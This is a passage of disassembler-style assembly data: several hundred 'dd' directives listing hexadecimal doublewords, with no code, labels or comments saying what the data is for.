		dd 93F158E5h, 2BADF86Ah, 55017E8Ch, 820FC2h, 20A6544Fh
		dd 6993CC93h, 6F5CB033h, 39BF5620h, 0CCDA6A79h,	70A69567h
		dd 0F2AE466Eh, 0EE67F02h, 0DF781E22h, 1797222Fh, 91BC860h
		dd 627EDF13h, 851E5752h, 7891C4A5h, 0CD22E30h, 7AE01250h
		dd 6B071393h, 0EC76DFFAh, 3D5445D3h, 28C0302Dh,	7C9E685Ah
		dd 2233F25Fh, 0AB2DBDD8h, 52580006h, 0CAA1C5B8h, 0FEC4F504h
		dd 8C658D29h, 0EF07D375h, 417D77C6h, 8FEFB542h,	441095FCh
		dd 2B5DFFA8h, 84229DE1h, 74DCE0CEh, 41EB59F0h, 3102C016h
		dd 158D2065h, 6310004Fh, 964C0318h, 8BB6D9F9h, 92506790h
		dd 0CCA3E19Bh, 82E1C2A9h, 0F8CD1ED5h, 38B1FDEBh, 3D9A174Ah
		dd 9FE1FFE9h, 0E365A8EAh, 83465205h, 8BB98BE8h,	34AEA15Fh
		dd 462BDA69h, 2F4BA458h, 5F71396h, 0BE40B1FCh, 0BD3EF05h
		dd 0B120FFC7h, 0B232D91Ch, 822790C7h, 0B542D46Ah, 1D47D759h
		dd 0EF1D9A1Ah, 0D7BE48C2h, 9F240F13h, 8FEA1FD9h, 320BC465h
		dd 8636416Bh, 0E8601BEFh, 8A09931h, 0E12C7F35h,	8FD7585Fh
		dd 0D4417FE7h, 338605DCh, 48CE0478h, 6346E161h,	0F8B3695Bh
		dd 0C594606Ch, 0D0D3348Ch, 0F629DDA0h, 0FCF3F013h, 0BB478FA3h
		dd 2BB687AEh, 0C539657Bh, 0F48C9751h, 0D8172FADh, 30A7D17h
		dd 0D05DDFB1h, 4610028h, 12B34C01h, 0E8D90D22h,	0B9AC31C9h
		dd 0C3D60AA7h, 633F70E6h, 0BEB0F0C4h, 0DEE2405Bh, 0F51A3D76h
		dd 8DA8EEADh, 61A2C637h, 215326DFh, 0ACD600C8h,	80455F4Fh
		dd 4B330348h, 10092EB0h, 289012A7h, 0E0DF0217h,	0F07CD81Ah
		dd 4F044A40h, 76186AA1h, 0D8321D79h, 51CE8715h,	0B166455Ch
		dd 0D61A362Fh, 0CA28C0CEh, 8DBE2C85h, 248677E7h, 0D1C6EE16h
		dd 0E9D02E4Dh, 0EDEA2B2Ah, 900E5987h, 0DA9B70A6h, 0F66E72ECh
		dd 737005D4h, 0D267C3A1h, 0F3C99E36h, 0C706C191h, 0C824F5DDh
		dd 90A0114Fh, 0A4C16367h, 208DBC62h, 0B3EFEE0h,	0FFBBFA40h
		dd 0CF2B08C6h, 0B9FDF688h, 275C0161h, 8C93DE1Ah, 559B8438h
		dd 0BAC7D4FEh, 73FC0BC9h, 97E8E8FFh, 0A720C55Eh, 0E42FAB32h
		dd 884D8970h, 3D01C401h, 76269A42h, 46EA25CDh, 287089DFh
		dd 0BCE67C26h, 2D128468h, 2B0E9704h, 0E2822D0Bh, 1B9A744Eh
		dd 8C6D6051h, 0C7A21819h, 6362D7B1h, 9553EA1Dh,	4E170342h
		dd 319C703Eh, 6708A589h, 307CBF14h, 562886F1h, 0E0513840h
		dd 100336C0h, 3B2ED475h, 935F2138h, 0D5BF2196h,	0E42ACAC5h
		dd 535398D8h, 988477DAh, 0B2313B28h, 0E2A84753h, 0F83335EFh
		dd 856D759Fh, 0AC8FA9F4h, 5C28BA02h, 0BBC599C0h, 5189D041h
		dd 0E94DB23Eh, 0E4973AC0h, 78FD434h, 31CBFC76h,	0F7E902E0h
		dd 771617Fh, 0EA5ADB1Ah, 0BA9DFF86h, 0B294CA50h, 607D31D1h
		dd 0BFEDE0FAh, 81E75ECFh, 0AA3E0BF8h, 6F9470EFh, 0C182C4C0h
		dd 80BF394h, 5016EB90h,	302C17FEh, 1E2F96A7h, 0ECB1D7DAh
		dd 607F9FF7h, 0A3BA447Ch, 0D383EFB3h, 5225D1Bh,	0A36DD477h
		dd 0C7CAA53h, 4680118Fh, 7E20BFADh, 0E26917C3h,	0D57428F4h
		dd 0DD5BD199h, 0FCF484Fh, 30060136h, 5CC3E166h,	882E1016h
		dd 9956A598h, 0AFEF110h, 6CBA8h, 30903066h, 2F2A2EB3h
		dd 2EC7EB1Fh, 28863F4h,	0C8852DDAh, 0E32FDA05h,	0E190AB72h
		dd 0FAE1331Fh, 30D198A3h, 0A76C687h, 2EB37840h,	14039414h
		dd 0CE3837F3h, 1F694375h, 7071F58Eh, 4AD09500h,	107278CCh
		dd 0FBCEBFC0h, 8BAB8122h, 5959F5C6h, 254E0BDh, 6068C717h
		dd 98338280h, 1D533AB1h, 0F85BE073h, 0FA482D21h, 0B00767F5h
		dd 3C2A8F31h, 0FA3EDD4h, 9D7EBCAEh, 45D88F2Fh, 0D33FA8B9h
		dd 0A5D45AA3h, 0C4DB6E1h, 0B587DD2Eh, 3C09C7A2h, 0E6E402E4h
		dd 2EF755C0h, 0EFB8B47Ah, 17182262h, 0F00C485Dh, 84E33890h
		dd 0EF02A3C2h, 832A285Eh, 63692957h, 0B2AA10BEh, 0C8082468h
		dd 914A091Ch, 0A59FFBD2h, 943AD0B3h, 0E4084B66h, 5B405887h
		dd 55556F09h, 0AE8F4638h
		dd 0BD1CCFD5h, 0F1AEB9F9h, 7DF8AB55h, 0D8B5CBA9h, 0E52F3D90h
		dd 23E46FE0h, 5FD4C89h,	0E4B42B7Fh, 0A8BD9A94h,	874A371h
		dd 25D30E60h, 975552E9h, 5D744BA8h, 76522EB2h, 0D0EDBB09h
		dd 9485ED7Eh, 0A6E5CFD4h, 6E359B34h, 2D5C2E90h,	18900E05h
		dd 49DD3CC0h, 6B0B0987h, 29F218B0h, 82124B9Fh, 867654ADh
		dd 0AA56B34h, 7F44EDEAh, 20C4342Bh, 52403609h, 207204C0h
		dd 148AE020h, 563E6084h, 0B615C2D3h, 8DC30DB7h,	3B047E26h
		dd 4C332729h, 4328E38h,	0FBBACC41h, 0ECE90Fh, 0E07C31D5h
		dd 8B161ED1h, 2781CA6Ah, 3C0535D2h, 18C9380Ah, 0B00C6F08h
		dd 0D039DDA3h, 0D96550D0h, 96343003h, 5165A3A0h, 3997612Dh
		dd 48545CD8h, 82FA0158h, 8E43621Ah, 0F419E556h,	18A9058Ah
		dd 39584EF1h, 0A79319F6h, 0B8A0BECDh, 873810A6h, 0E10D2Ch
		dd 5AF8CCFEh, 6E10DEFFh, 0DBBC14DCh, 7F11FC33h,	63BCF670h
		dd 591A008Ch, 99B9DFF6h, 0BEFD3681h, 0A6CD50EFh, 0DAF1BC1Fh
		dd 514BD7C6h, 0A633355Fh, 910BAF99h, 621FC4F8h,	287F6A06h
		dd 43F684D7h, 0C530A6E5h, 75AE096Ch, 0BA7B641h,	0EA98632Eh
		dd 0A764E8A7h, 7037BE5Bh, 0BCA707Fh, 6500FEE8h,	0AC9C878Ch
		dd 673DC64h, 9E2FA878h,	11059728h, 43CCE287h, 0A67319C1h
		dd 9B7BE30Ah, 0C0D0163Ch, 6E7ECB49h, 8D390F41h,	0B13FF943h
		dd 6E00523Eh, 0AA1CF036h, 2ECC33E0h, 6C6CECE4h,	0AF42C99Dh
		dd 702122Eh, 0F012860Eh, 294F03EFh, 0EF807EA0h,	7511543Ah
		dd 414F15A8h, 0A2EB044Fh, 4AA91E62h, 740EC568h,	7681C564h
		dd 8BFF9BACh, 0DD37F705h, 94F2FEA5h, 3AE2139Ch,	6CCA1387h
		dd 12623242h, 48C49AC8h, 94A6A6Eh, 775C299Ch, 49141287h
		dd 46789126h, 35D4135Eh, 2322BA66h, 0A4D33ACDh,	0E29526F1h
		dd 1F0680A1h, 268E53CDh, 0D85FE07Dh, 0DAA4C05Ch, 72ABAB18h
		dd 9C1F5592h, 0B262A812h, 1BA90A10h, 9B21A03h, 6AFF762Dh
		dd 0AFEB87B8h, 0B906FC2Fh, 0A45E60ECh, 50F46F49h, 990477F7h
		dd 0C58A3E48h, 0EEA1C058h, 7435A626h, 12D8EE90h, 0D7FD096Bh
		dd 91CA282Bh, 0E38C51Ch, 223E2E90h, 44150814h, 8B22B7FCh
		dd 972443D9h, 0E1AC7E13h, 65348189h, 7FE1C3A3h,	0CE83A1DBh
		dd 28E97FA6h, 41547EE0h, 80EA1BEBh, 2A28381Bh, 0B543560h
		dd 4BED7B47h, 0D0FB9815h, 0A3142317h, 0E40FF698h, 65DC6D4Dh
		dd 4DC385F6h, 0A2550F8h, 87756F13h, 616CB4D2h, 47A8EF14h
		dd 8D37F301h, 0F0BA5118h, 50D08267h, 0A3A8F3D7h, 8181943Eh
		dd 943E8591h, 29F273A2h, 97D98FD2h, 27E9462Eh, 680A18BAh
		dd 69133826h, 0F2671F48h, 2050EC89h, 0A6D03866h, 1C1F6AAh
		dd 31272BE0h, 2041B5F1h, 3CF542F8h, 0C16CE66Ah,	63F87AC1h
		dd 6560CE55h, 0F84F5B37h, 67A31050h, 9853037Ch,	0D74E0B0Fh
		dd 81A5AD7Fh, 3ECBEAC5h, 13FD9A21h, 90FA997h, 94E8DB4Ch
		dd 6965C152h, 0D0E8ABAFh, 34E37863h, 0FCDA9AE7h, 0E38F74C9h
		dd 1A866550h, 535F282Fh, 22F69F56h, 0FAA94FF2h,	0EA45181Ah
		dd 38C4AEADh, 9104A10Dh, 0A6924F95h, 55A36F41h,	10B28E8Dh
		dd 4ABC2469h, 4C483174h, 0F61ABD06h, 503AA044h,	0CAE86668h
		dd 37AE7517h, 6357E85Dh, 1A57E040h, 0F5495B48h,	6969E3E8h
		dd 0AABB4D84h, 0D8BB9A7Ah, 1B1B869Ch, 83AD4A98h, 2516C534h
		dd 92ED8BB8h, 130C9DF7h, 4622226Fh, 2D232158h, 6EE886E1h
		dd 0D6274A2Bh, 0A9A20490h, 63131FC8h, 0FD3CB325h, 4972C7E2h
		dd 1EED6945h, 48E22575h, 4ED5C2FBh, 69499996h, 5A5A6CB0h
		dd 0B35F3920h, 0B39F9EC0h, 75A46898h, 4A0A7EC3h, 2BA80CE3h
		dd 509A6A11h, 9024F7ACh, 87555052h, 350D6C8Eh, 4C517BD5h
		dd 25A327FFh, 0B351A50Dh, 0B00B2B21h, 26A9A692h, 65343ECDh
		dd 1E684745h, 0E4BA7AE5h, 0B5F3CA5Dh, 0D185F038h, 0C5E54698h
		dd 0C9F236F5h, 8C338EDDh, 201850E9h, 0FC81F29Eh, 95F569B0h
		dd 7719034Dh, 34620F01h, 0E6D8F598h, 0DB7D9E3Ch, 16372E15h
		dd 544218A1h, 287ECDA0h, 139AE93h, 1029FF93h, 0A1221463h
		dd 0CA057F93h, 85036B96h, 282CE71Ah, 8A4980A9h,	1A147902h
		dd 0FB548154h, 0B484AA31h, 629056B2h, 1E835FA0h, 350EE872h
		dd 0F77FF10Ah, 86B91181h, 2D899EBBh, 0E417AADEh, 0C3060AFBh
		dd 885F828Ch, 0BF76B83Eh, 3038FAB5h, 0D3C00043h, 0A5BAFD06h
		dd 71F3DC1h, 0CA5685B0h, 0DFBD6C2Ch, 2B9268A7h,	940481F3h
		dd 1F56317Eh, 36D3294Fh, 0F38CA81Ah, 16974523h,	0F2F49FBEh
		dd 0D18F8162h, 36FC6169h, 0CC6E67D8h, 781817F7h, 1197A061h
		dd 0D4DADAD4h, 0DB56D144h, 901B43F1h, 589C9F19h, 7588C8F6h
		dd 0FB344487h, 618400A0h, 0A0800663h, 8ED2617Ch, 331F47Bh
		dd 0D9A4362Dh, 6224D358h, 55052589h, 0AF7C6FCBh, 2069CE21h
		dd 0F1B37CD7h, 40834B7Dh, 3A73C813h, 0A46BC94Ah, 227E14CFh
		dd 50948CF2h, 85D0110Eh, 2839DC0Fh, 0A4C2E504h,	507418D8h
		dd 0A17377D6h, 1D370297h, 4B820488h, 57BC98B3h,	0F196A93Fh
		dd 18A170A6h, 0D80E5A07h, 0A50054FEh, 1EFB0CC1h, 17436831h
		dd 1C4F1EF6h, 0C6A25BE5h, 0EC0A5BC9h, 815CFAD6h, 0A4F25B69h
		dd 8732540Ch, 3D746B7Dh, 0EE725070h, 0C6814C04h, 6658D049h
		dd 7F20CC29h, 0D01D72Eh, 0DB0151Bh, 3959825h, 0D0883FDh
		dd 0F72F7630h, 2FC690FDh, 608B1158h, 3163A240h,	0F8987546h
		dd 0A1D90BC0h, 0FD805D60h, 0B9ABD9B9h, 8CE34039h, 1385ADDFh
		dd 1BF1F501h, 1867FEE5h, 2101434Ah, 467224A8h, 0C0FB5EB9h
		dd 0C6D3A67h, 185570E2h, 91041400h, 88878EC3h, 22440202h
		dd 0A2489081h, 0A7141080h, 5B3EEAh, 0F2F73DC8h,	137202C5h
		dd 0E55A4AB4h, 2AA1AADBh, 62D3088Dh, 58593686h,	0D627BE71h
		dd 91685E55h, 87C60D55h, 0B20DAAACh, 50F020AAh,	21810683h
		dd 37586C5Dh, 8DEB6A17h, 0E10A342Fh, 57AE8115h,	1040F03Eh
		dd 0D7098133h, 0AD67F311h, 0BD7803CAh, 8F0AC050h, 1E415BB1h
		dd 98018E18h, 12100C30h, 60EA4409h, 87018901h, 0C443555Ah
		dd 1F17137Eh, 314605A7h, 91F9CADFh, 899BCC48h, 0D44BDF3Dh
		dd 1329691h, 0F9F30265h, 0FC8F4082h, 28C4903Ah,	0AD85A2DDh
		dd 8C44C55Eh, 2487A015h, 57EE29C1h, 8500C354h, 80561B1Eh
		dd 1556A9B2h, 0DF65E843h, 4AE2254Ch, 3240F620h,	8569E0D7h
		dd 0E542D6A8h, 0C329938Ch, 8A041948h, 12024400h, 41B08481h
		dd 0A648CA82h, 0DA152658h, 0B2D97EDDh, 0AC5337EAh, 0F92071F7h
		dd 6489A328h, 7E295597h, 57D7A615h, 0D62A285Fh,	10B90A2Bh
		dd 7C311C50h, 8468E6B2h, 6C398D43h, 0A1D10F01h,	0C6866CCCh
		dd 45C40616h, 0B8766352h, 1F091E24h, 17C19D09h,	5C488FF2h
		dd 87119D97h, 8956E55Ch, 0A1EFDB02h, 43B3670Ah,	6320284h
		dd 45536C01h, 101D50B2h, 0B22EDC63h, 9262062Eh,	513E8E44h
		dd 5A20A11Dh, 92C98BEh,	7097CFE4h, 38EA617Eh, 2BBC1CF2h
		dd 86F9CFBBh, 13C5A6CAh, 56150384h, 862BFF95h, 613805C7h
		dd 2B2A33FBh, 52451796h, 9D08F59Bh, 2221AA6Bh, 22400258h
		dd 2240648Fh, 6D4C9288h, 0AFEC5DD0h, 7AD009A6h,	174A5F23h
		dd 20661231h, 34049290h, 39B73804h, 4AB99959h, 0E02158B0h
		dd 0CA2F250h, 0FA4962E7h, 67A26ED9h, 0E8691B3Fh, 0F7DE5B1Bh
		dd 0B818F817h, 66295AA3h, 176DAF47h, 76C6A100h,	0EBC821C1h
		dd 97D758Bh, 0FAD0D953h, 3844FA45h, 0B44AB36Bh,	97941D78h
		dd 65DEED29h, 4C9B3750h
		dd 8CC49601h, 55973275h, 0CCAD9424h, 0D585918Ch, 0F8CC2F95h
		dd 0A450E3B2h, 0CBF867F1h, 0CD85D228h, 6A3FBC5h, 319AE333h
		dd 0A308F2B0h, 88C64893h, 9887F32Ch, 3ACC6A41h,	46CE1B68h
		dd 0AE7C6067h, 29C68E74h, 4D20A4E3h, 0BD0951B8h, 0A3C351C2h
		dd 97989F45h, 5292EE75h, 0C47A8B6Ch, 6AEB08EFh,	2E574438h
		dd 0FAD24FFBh, 38E054Dh, 319D9D1Eh, 6604FFD0h, 400CECE2h
		dd 0F0D4EE10h, 0A9A68443h, 7CA767B1h, 5D0902B0h, 0F44AC1C4h
		dd 0E69F2F17h, 0E17D77EAh, 0F00F8A46h, 0D5C9155Ch, 0C4DF9A9Ch
		dd 7EEB3BCEh, 5FB7D87h,	0F009A863h, 0D34B4BC5h,	0E06F0A32h
		dd 6475A577h, 0C8F4ECA3h, 2BB5F1B3h, 4145EFFCh,	0AC180403h
		dd 0DA20E4FDh, 0AC4C5EC5h, 1A566AE9h, 52C1E2E9h, 0D791C91h
		dd 842EEEDDh, 21826618h, 0F95584E8h, 63913383h,	20ECFA63h
		dd 0A3B915CDh, 14A5AC36h, 4BFF678Bh, 22286196h,	0F964056h
		dd 3F66084Ch, 32A73619h, 0A362FC52h, 0F60791B5h, 3F0EA0C4h
		dd 0D8922448h, 3F942FBh, 3BC8A4EFh, 6911585Eh, 54FE9636h
		dd 0EEF69DFCh, 231405B0h, 26362608h, 7773634Ah,	0A28B9EA4h
		dd 0C459D2FCh, 1FFACD00h, 0C2AA430Fh, 0FC3BB5Ch, 9A2B81FDh
		dd 9331F91Fh, 11D4EDEBh, 47053E9Dh, 0F46F8862h,	8FC092B3h
		dd 9E5BC259h, 2B3A42Fh,	0AF72C45Bh, 0E49C4211h,	5D3A979Dh
		dd 0CAD8B29Eh, 0BACCAFADh, 10C4511Ch, 1F93160h,	649468C1h
		dd 0C6CB37CEh, 0E6936558h, 518FCF48h, 0A525F783h, 5B311BAEh
		dd 974E985Eh, 39E82808h, 0CA29839Ch, 5E4B8551h,	0F2C01B7Ch
		dd 0E857B055h, 7954954Eh, 541A78ACh, 0AC099C0Bh, 8A3F8E5Ch
		dd 3ECA0F47h, 0A20A75AFh, 5C0F98AAh, 0D4C24126h, 89055DC9h
		dd 0DCAAAB87h, 33BE3EC3h, 1EBEA493h, 0D04C3118h, 6330F1FAh
		dd 9F780559h, 56BF640h,	4417A402h, 0AB029EB5h, 6892E354h
		dd 7B8CC781h, 0F7BDC4EDh, 9097C45h, 5D758019h, 30A0E24Fh
		dd 0AFDBA806h, 5DA9404h, 0F0AED554h, 614CB62Fh,	2317E67Bh
		dd 136B3E6Ah, 623508AAh, 9A562BB9h, 0D0E47204h,	26B300E5h
		dd 49276B55h, 5F3D8DDEh, 0E6CC0C69h, 0A9ED2AADh, 29002BCh
		dd 386E8643h, 0F1E495A2h, 194282AEh, 0A60A1201h, 6D8052C4h
		dd 0B768EB2Fh, 91391145h, 66F98DD2h, 54B60588h,	4BE3CC2Ah
		dd 0FE8C0E33h, 0C065CE6h, 26EDE69h, 8A271883h, 3D184412h
		dd 2A9E8BD3h, 0B1DC5115h, 0A870B959h, 0A6CEA824h, 2F7592DEh
		dd 56BE90Ah, 17769E6Eh,	6037D714h, 0B26C0D5Ch, 10F5A31Eh
		dd 89D710EDh, 2E58F405h, 9903800h, 0AAA20722h, 772BC643h
		dd 21F858B5h, 0FE1AC87Bh, 0B9245FC2h, 0A9089626h, 813D902Bh
		dd 2C271FF9h, 0DE11A326h, 723535F9h, 0F0ED578Ch, 98DC43C5h
		dd 60E766A5h, 0CAEB0041h, 0BD2C0442h, 4441D750h, 7A96B05Bh
		dd 76B35DE8h, 2C292FA3h, 4A192833h, 0C66050B4h,	42F44281h
		dd 61F3AEF4h, 1251E15Fh, 5B316A64h, 77938B62h, 0DB9639C5h
		dd 0FDA692D7h, 39CC2BBCh, 34092F06h, 91C5E783h,	2A32B400h
		dd 0B388339Fh, 0C08B3512h, 0DFE0282h, 0CE918DDAh, 0D4022FF8h
		dd 0D046FFC9h, 663CF4DEh, 2496F83Eh, 10604028h,	8F4E0789h
		dd 0A045427Eh, 64403A97h, 4E8180F6h, 97610102h,	0B259F4BFh
		dd 8CC903E0h, 0CC3CE4EFh, 0FD9B7743h, 5064895Fh, 58D111A9h
		dd 17B46160h, 663E24C8h, 240AB135h, 0C8C83825h,	3463EF73h
		dd 0EC791FA9h, 0E010E562h, 87E3719Bh, 0B57FFF90h, 1157A16Fh
		dd 0C67D337Eh, 0DC395A7Dh, 0FE981518h, 0BADC7014h, 6E2B26E2h
		dd 8C6F638Ch, 562F34F7h, 89C6F310h, 8D3B1089h, 0B7E44915h
		dd 31071461h, 663A63C3h, 0B4C898DFh, 579C6638h,	35412334h
		dd 74041F1Bh, 3CAFB679h, 319E1AE3h, 1A2D01FCh, 178C1D6Eh
		dd 0AD7CC14Bh, 4D8B6269h, 9A149645h, 89EA3D6Ah,	0AECC5526h
		dd 4097321Eh, 37F7F56Ah, 91DDC8A5h, 0C04FAB55h,	0DA1030E4h
		dd 7FDF6418h, 0D12434E1h, 3034A418h, 230AE830h,	8821F58h
		dd 0E95A3DE9h, 947DA68Fh, 0DD721E24h, 8AED8DF2h, 5FE35161h
		dd 8DFCEF18h, 924A950Dh, 73941778h, 7C77AC22h, 0CBDE04B7h
		dd 58864E0Dh, 47F60217h, 7C28272Ah, 9555089Ch, 442B4728h
		dd 0B3276C68h, 7798ED4Fh, 0A8194CFDh, 6603D07Bh, 704A51D8h
		dd 5003A7D1h, 760D5F25h, 29D32555h, 0AAE0A056h,	26CA76E8h
		dd 8A498230h, 0D158B968h, 4273702Eh, 45F63D68h,	0B3053665h
		dd 0F1B446CAh, 8B32DC20h, 0D5B27A18h, 0C9D52048h, 69A4E476h
		dd 981F1493h, 7DB51534h, 50F14526h, 24875DAEh, 628A201Dh
		dd 0CE001C06h, 4C015932h, 0AAA4A0AEh, 6F230658h, 0F603668Ch
		dd 0A2101249h, 0DA379A9Dh, 0D2D8CA3Ch, 0ECA45581h, 360B998Eh
		dd 8F39A4AEh, 13144118h, 0BD5C6C07h, 10248A21h,	0C016A9D8h
		dd 0BD32096Ah, 90DBCCD1h, 99A456FEh, 0AB511274h, 2B378C14h
		dd 0BC345270h, 28431DA5h, 4B17DB2Ch, 71302920h,	0A32EF853h
		dd 4AD08D96h, 31FF693Ch, 0F4FECE9Ah, 9C6254D5h,	0A6385311h
		dd 3D4A5F2Eh, 4754C089h, 862DB6D7h, 25EBED50h, 49561E94h
		dd 7C2495B0h, 59559371h, 0A53B4256h, 0E3E56491h, 0AD9A2657h
		dd 6DE41B58h, 0AAE64ACBh, 0F98EF20Ah, 2BE8B34Ch, 457DF629h
		dd 0C0F363D0h, 626D8B9Eh, 711791EAh, 2E144457h,	8CCD15F6h
		dd 33F1AC23h, 0A0A69C66h, 0D66C934Ch, 6D55A8Ch,	636FC029h
		dd 0C9303244h, 0C8BB83C8h, 2C6DD9D8h, 1C251751h, 6D281D23h
		dd 1D709666h, 8545C2C5h, 12224476h, 4B038C80h, 9DCBCC9Ch
		dd 0B26BB2BEh, 0D1FC5F19h, 0E7AEEC1Eh, 85308301h, 4CA2F6Ah
		dd 21073293h, 1B2795A2h, 759F57D9h, 7E381501h, 18C82BB8h
		dd 9F18AE8Eh, 315F2E8Dh, 116C62Fh, 0B07E6103h, 20C088AFh
		dd 0EE03F3FFh, 0C8A98537h, 0B2D752BBh, 862F0FDFh, 0D071959Ah
		dd 80898C52h, 0A3038712h, 68D5464Fh, 1D2823FEh,	69A22D41h
		dd 0FFC631Dh, 5EC14CD9h, 65AB1ED5h, 83D28F85h, 22614221h
		dd 0A23815B0h, 0A2757EC7h, 0CDFCBE7Dh, 25F64608h, 0F18C20Eh
		dd 0FD7BD86Eh, 0D73E0EE6h, 4C646579h, 84359FE4h, 8A3A051Eh
		dd 4CFB1117h, 48F5A25Bh, 4A7E6A21h, 0C453E63h, 0A2666A75h
		dd 61377F0h, 5E2AA2FDh,	82DAF551h, 84365F7h, 295C597Dh
		dd 1CC28F45h, 0B1160310h, 65A15811h, 6C46446Ch,	11B31B21h
		dd 6CE5CA5Ch, 417C1744h, 6011E11Bh, 446D46D2h, 1B61B518h
		dd 0DA646621h, 19448C46h, 611B11B7h, 46E26DE6h,	0B91A819Ch
		dd 66A16811h, 0AC46446Eh, 11BB1BA1h, 6EE6EA6Ch,	4D771B44h
		dd 0C92CE12Ch, 6AEC0C9h, 6E1F5F3Dh, 9EAD31D3h, 0C6DB5A32h
		dd 0AEA30FF7h, 0BAFB52FFh, 4A1BAF1Eh, 0AF4621F8h, 0C0E96EF1h
		dd 61C6B3CFh, 2A75CD97h, 0DB475B07h, 419323DDh,	1084B046h
		dd 557CE023h, 698DE8CAh, 15161F1Ah, 2294DEAAh, 2DD2955Ah
		dd 34EB3340h, 9C8229A4h, 10E7A68Dh, 0A2CB8293h,	67FFD1DEh
		dd 7193543Ah, 87EDAF63h, 4987504Eh, 33E1A22Fh, 199A8211h
		dd 0FF4E5AA3h, 717FFFDFh, 897CC440h, 0C72FABCFh, 0DEE0E31Ah
		dd 0BA0A3D44h, 0EB962B25h, 0FBF85064h, 0A9E78636h, 68E095F0h
		dd 560A89C0h, 0C7ED7271h, 8120CF9Fh, 0FC3025D2h, 0FD2360E0h
		dd 0D0563A81h, 5CC906A0h, 0E70B6D50h, 0CB155FBFh, 24ECD2BAh
		dd 86D67ABFh, 8E9728B0h, 59DF4422h, 29960D00h, 0CC0E1184h
		dd 0D4DF0F8Fh, 135CB592h, 0AEBEA43Fh, 0B441514Dh, 0A0B640CEh
		dd 0ECC501E5h, 0F2BE57F2h
		dd 32197F2Ch, 4726C6DFh, 910431BDh, 0CF450C88h,	6F5C95FAh
		dd 0B9615EC4h, 64564AAh, 7FE1F06h, 818B5C68h, 797DA0B3h
		dd 0A1887FB1h, 3359B765h, 9446CAECh, 9F575E03h,	0CA2F14B1h
		dd 6D78DB5Fh, 4747F15Fh, 4C05AB2Fh, 70A5E1C2h, 7E8AF727h
		dd 0CD51D40Eh, 0F3A1EF44h, 45005779h, 0CC7C73BAh, 772B1C0Eh
		dd 0F5AEF73Dh, 2EC7FDFFh, 0B82B616h, 0E3F4DDFCh, 0EE0AE9D6h
		dd 48E30824h, 107422D7h, 0CD8A8D2Dh, 0A895AEC7h, 0FE2A6820h
		dd 34565D42h, 6EDEBAA3h, 0E0736A60h, 0E46A98C4h, 8C6716AAh
		dd 0FB8D5CE0h, 0CB5F1947h, 1AD66D4h, 478AC761h,	7AE3F0E6h
		dd 0BAA69557h, 258CC62Ch, 15DEAFE0h, 0C2BB5A47h, 0E1B6B388h
		dd 9B08D6FBh, 577A2E72h, 9C9962EAh, 0B75BD05Bh,	471A181Ah
		dd 0B0E9E666h, 64A8A8BDh, 0E6415662h, 0C4D1B8AFh, 498389C6h
		dd 6D6DA097h, 8C96E7D6h, 97445385h, 0E32AC5C1h,	25D21664h
		dd 98191B96h, 0A85BA2AAh, 7B72C62Ah, 42ABC646h,	7C10AA24h
		dd 2D959B91h, 0E534957Ah, 430954B3h, 5A8B6147h,	877AC31Dh
		dd 0F1B51EEDh, 585B7D15h, 50C621F8h, 0C494BD95h, 0B5028308h
		dd 829D0A55h, 3FCC1179h, 0FDAAC1F2h, 902C620Ah,	17E8DB8Bh
		dd 0FA06CEF9h, 0D14A5602h, 81318171h, 4AC28207h, 0DDC2F460h
		dd 0B9A46FD2h, 0FE162EAFh, 0F7454165h, 0DC39857Eh, 0EFB05EFFh
		dd 8B8F06ACh, 4B8A0596h, 0A67FDFCFh, 0F619A6FFh, 0C583F9CDh
		dd 23498886h, 34C84406h, 586C5F8Bh, 0B207E31h, 419985CCh
		dd 0D1955C1Ch, 0C4820026h, 0CC324FE4h, 5007A5F3h, 8188CEA9h
		dd 0CD63104h, 0B62B3A21h, 533F97E9h, 2DF42E39h,	5D0B4EBh
		dd 7FEB38Bh, 0F97AF51Bh, 0E28C2B7Ch, 6A3CE04Ch,	0FF7C4D0h
		dd 0AE76EC26h, 0FF0F278Ah, 56DA27E7h, 9B61C159h, 860A1ADFh
		dd 4218313Eh, 51CB3291h, 0B131F695h, 92CB450h, 12AA660Ah
		dd 322AEB24h, 7213DF13h, 3DE6EE2Fh, 0ABD922BEh,	2648CC8Ah
		dd 0F1D1C45Fh, 0DE64BA43h, 6284D5EAh, 1B8C6576h, 7525F8A9h
		dd 6A9B8EB5h, 43058D0h,	5F4CAF5Ch, 0B985AF15h, 0C0FDD63h
		dd 54BFFE84h, 382AED8Ch, 168CD1DAh, 0C1546C61h,	4C9082BFh
		dd 0BF05C636h, 0E6AFDC25h, 8B6D6F9Ah, 2AB67174h, 0D1824F54h
		dd 957F8AD5h, 0AF2AF35Eh, 5DAD17C3h, 0E1E48075h, 0DB19BAE1h
		dd 64CF92h, 0AC14884h, 888630A0h, 0F4EF31B7h, 0FA10E498h
		dd 0EBCCBF10h, 81F6B0D7h, 5BDA1869h, 0D50A5816h, 5096C803h
		dd 415CA54Dh, 80962D00h, 92AEAAD5h, 1039C085h, 0F1EEC439h
		dd 0BB38B457h, 748A04ADh, 986A4931h, 95848626h,	144AE003h
		dd 40D5AC08h, 516FD081h, 0E0DEB620h, 0DE5C05Dh,	2CE9A45Ch
		dd 28F0DBAh, 0F09750BAh, 0F896211Ah, 10AF311Ah,	2E698113h
		dd 18406470h, 71121132h, 0C2311AD8h, 0E236081Ch, 870224CCh
		dd 8711300Dh, 0B80AB00Bh, 0B8D0732h, 61331946h,	9C604236h
		dd 2368588Dh, 88DA68C0h, 42361330h, 188D44CCh, 88BCA133h
		dd 4CBEAC61h, 4CE021B0h, 133821B4h, 0C4CD236Eh,	13388DBh
		dd 0C78B8237h, 0ED49688Ch, 0E5C46018h, 0CF409FFDh, 503A8A04h
		dd 8C602099h, 0A3178C13h, 8963B32Fh, 9C6DC9EBh,	30996C86h
		dd 0B8F6A08Ah, 0EF0885FFh, 0F6289387h, 2A459E2Bh, 0EEB386FFh
		dd 54FEE778h, 0F8A5BF13h, 7749CF4Fh, 0F07D0F34h, 9E28EE81h
		dd 851E7132h, 6CBF6AA8h, 0B825D99Fh, 60447983h,	0FBE3E30h
		dd 0FECC008Eh, 0CCB93B0Bh, 42FDF8E4h, 0F8541996h, 0F1AC3517h
		dd 0BB1E6C01h, 7DD87D2h, 0F598B847h, 7FB50699h,	3B019D21h
		dd 80F05041h, 829EA1C8h, 2FEB7CD1h, 0FA0BD844h,	215BD1F4h
		dd 0F8E357F4h, 0A0CF64E0h, 8720EBDAh, 133F3C0Fh, 19F3E4FDh
		dd 0C5BE697h, 9D8B2C17h, 31081745h, 27D6F20Dh, 845E1F3Eh
